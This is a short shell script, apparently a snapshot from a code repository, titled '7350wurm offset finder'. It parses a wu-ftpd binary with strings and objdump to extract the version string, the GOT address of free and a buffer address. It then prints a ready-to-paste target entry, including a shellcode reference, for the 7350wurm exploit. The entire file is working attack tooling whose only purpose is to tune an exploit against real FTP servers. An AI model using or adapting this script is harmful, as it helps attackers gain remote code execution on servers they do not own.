blob: 7624071907b3b01987d062f75aa9800e46e3e190 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
|
#!/bin/sh
# 7350wurm offset finder
# dvorak & scut
check_util ()
{
for util in $*; do
echo -n "checking for $util: "
if ! which $util; then
echo "not found, aborting"
exit
fi
done
}
echo "7350wurm exploit offset finder"
echo
if [ $# != 1 ]; then
echo "usage: $0 /path/to/wuftpd/binary"
echo
exit
fi;
check_util strings objdump
echo
versionstring=`strings $1 | grep ^Version`
echo $versionstring
freeaddr=`objdump -R $1 | grep free$ | grep -v glob | awk '{print $1}'`
echo $freeaddr
strncasecmpaddr=`objdump -T $1 | grep strncasecmp | awk '{print $1}' | \
sed "s/^0*//g"`
echo # $strncasecmpaddr
tmpaddr=`objdump --disassemble $1 2>/dev/null | grep -B3 $strncasecmpaddr | \
grep "\\$0xa" | awk '{print $1}' | cut -d ':' -f1`
echo # found at $tmpaddr
tmpreg=`objdump --disassemble $1 | grep -A3 "^ $tmpaddr" | head -3 | \
tail -1 | cut -d '%' -f2`
echo # $tmpreg
cbufaddr=`objdump --disassemble $1 | grep -B200 "^ $tmpaddr" | grep $tmpreg | \
grep "\\$0x80" | head -1 | cut -d '$' -f2- | cut -c -9`
echo "target:"
echo
echo '{ "insert exact dist, rpm, .. here",'
echo \"$versionstring\",
echo 'x86_wrx, sizeof (x86_wrx) - 1,'
echo 0x$freeaddr, $cbufaddr },
echo
|
